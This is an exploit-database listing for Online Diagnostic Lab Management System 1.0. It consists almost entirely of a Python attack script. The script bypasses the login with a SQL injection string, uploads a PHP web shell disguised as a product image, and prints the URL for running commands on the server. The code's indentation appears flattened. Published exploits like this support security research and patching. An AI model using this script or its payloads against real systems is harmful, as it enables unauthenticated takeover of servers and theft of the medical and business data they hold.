Exploit for Online Diagnostic Lab Management System 1.0 SQL Injection / Shell Upload

Name: Exploit for Online Diagnostic Lab Management System 1.0 SQL Injection / Shell Upload
Rating: 5 (175 reviews)
2022-09-26 | CVSS -0.1
## https://sploitus.com/exploit?id=PACKETSTORM:168498
# Exploit Title: Online Diagnostic Lab Management System - Remote Code Execution (RCE) (Unauthenticated)  
# Google Dork: N/A  
# Date: 2022-9-23  
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11  
# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip  
# Tested on: windows 11 - XAMPP  
# CVE : N/A  
# Version: 1.0  
# Authentication Required: bypass login with sql injection   
  
#/usr/bin/python3   
  
import requests   
import os  
import sys  
import time  
import random  
  
# clean screen  
os.system("cls")  
os.system("clear")  
  
logo = '''  
##################################################################  
# #   
# Exploit Script ( Online Diagnostic Lab Management System ) #  
# #  
##################################################################  
'''  
print(logo)  
  
url = str(input("Enter website url : "))  
username = ("' OR 1=1-- -")  
password = ("test")  
  
req = requests.Session()  
  
target = url+"/diagnostic/login.php"  
data = {'username':username,'password':password}  
  
website = req.post(target,data=data)  
files = open("rev.php","w")  
payload = "<?php system($_GET['cmd']);?>"  
files.write(payload)  
files.close()  
  
hash = random.getrandbits(128)  
name_file = str(hash)+".php"  
if "Login Successfully" in website.text:  
  
print("[+] Login Successfully")  
website_1 = url+"/diagnostic/php_action/createOrder.php"  
  
upload_file = {   
"orderDate": (None,""),  
"clientName": (None,""),  
"clientContact" : (None,""),  
"productName[]" : (None,""),  
"rateValue[]" : (None,""),  
"quantity[]" : (None,""),  
"totalValue[]" : (None,""),  
"subTotalValue" : (None,""),  
"totalAmountValue" : (None,""),  
"discount" : (None,""),  
"grandTotalValue" : (None,""),  
"gstn" : (None,""),  
"vatValue" : (None,""),  
"paid" : (None,""),  
"dueValue" : (None,""),  
"paymentType" : (None,""),  
"paymentStatus" : (None,""),  
"paymentPlace" : (None,""),  
"productImage" : (name_file,open("rev.php","rb"))  
}   
  
up = req.post(website_1,files=upload_file)  
print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)  
print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")  
else:   
print("[-] Check username or password")